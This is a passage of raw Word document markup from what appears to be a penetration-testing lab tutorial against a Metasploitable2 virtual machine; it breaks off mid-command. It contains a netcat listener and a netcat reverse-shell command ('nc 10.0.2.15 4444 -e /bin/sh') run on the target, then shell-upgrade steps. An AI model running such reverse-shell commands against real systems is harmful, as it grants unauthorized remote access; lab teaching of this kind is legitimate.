    <w:p w14:paraId="0D1EC961" w14:textId="74D9BD93" w:rsidR="00CA4827" w:rsidRDefault="00CA4827" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604AA9C9" w14:textId="393C442D" w:rsidR="000E1703" w:rsidRDefault="000E1703" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58104BA9" wp14:editId="18080CCF">
            <wp:extent cx="2550017" cy="1046119"/>
            <wp:effectExtent l="0" t="0" r="3175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200" cy="1058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9429E" w14:textId="6649C0C2" w:rsidR="00CA4827" w:rsidRDefault="00CA4827" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>On the target machine (Metasploitable2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">, type the following to establish </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell with our attack machine.</w:t>
      </w:r>
      <w:r w:rsidR="000E1703">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> The IP address is that of my attack machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087BD4B" w14:textId="355B6768" w:rsidR="00CA4827" w:rsidRPr="00CA4827" w:rsidRDefault="00CA4827" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CF8DE34" w14:textId="58EA3DB4" w:rsidR="00CA4827" w:rsidRDefault="00CA4827" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06395BC9" wp14:editId="6FFAA5A9">
            <wp:extent cx="4848860" cy="502285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860" cy="50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E17F4" w14:textId="3939609A" w:rsidR="000E1703" w:rsidRDefault="000E1703" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Once the reverse shell has been established on the target machine</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will see the prompt change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B1C61" w14:textId="51A3B02C" w:rsidR="000E1703" w:rsidRDefault="000E1703" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38DB090F" wp14:editId="55A26258">
            <wp:extent cx="3683358" cy="868282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8792" cy="8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0899E" w14:textId="33C4F9E9" w:rsidR="003969EC" w:rsidRPr="003969EC" w:rsidRDefault="000E1703" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY connection with </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>minimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality. </w:t>
      </w:r>
      <w:r w:rsidR="00060DD6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">At the prompt, you can see the user </w:t>
      </w:r>
      <w:r w:rsidR="003969EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>on the target</w:t>
      </w:r>
      <w:r w:rsidR="00060DD6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> you are currently interacting with</w:t>
      </w:r>
      <w:r w:rsidR="003969EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using the </w:t>
      </w:r>
      <w:r w:rsidR="003969EC" w:rsidRPr="003969EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="003969EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA45451" w14:textId="42C4D13E" w:rsidR="003969EC" w:rsidRDefault="003969EC" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">To see what current working directory you are and connected to, you </w:t>
      </w:r>
      <w:r w:rsidR="000C518F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003969EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA0F79" w14:textId="3472D9DA" w:rsidR="003969EC" w:rsidRDefault="003969EC" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">To see the contents of the working directory, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="003969EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDC97E" w14:textId="76C95E3D" w:rsidR="003969EC" w:rsidRPr="00CA4827" w:rsidRDefault="003969EC" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52531B78" wp14:editId="2C4A5099">
            <wp:extent cx="5943600" cy="146177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6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8676B" w14:textId="03EEA339" w:rsidR="00CA4827" w:rsidRDefault="00060DD6" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060DD6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading </w:t>
      </w:r>
      <w:r w:rsidR="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>a Dumb</w:t>
      </w:r>
      <w:r w:rsidRPr="00060DD6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell to Fully Interactive TTYs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D9113" w14:textId="3F9A1682" w:rsidR="00CA4827" w:rsidRDefault="00D537EE" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">One of </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>easiest ways to upgrade a dumb terminal is the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> use Python to spawn a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>pty.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Python comes with the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>spawn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> a ps</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>eu</w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">do-terminal that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>to think they are being</w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> executed in a proper terminal. To upgrade a dumb shell, </w:t>
      </w:r>
      <w:r w:rsidR="00A6337E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">at your Kali terminal, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D537EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9828A1" w14:textId="4544B3F5" w:rsidR="00A6337E" w:rsidRDefault="00A6337E" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6337E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6337E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
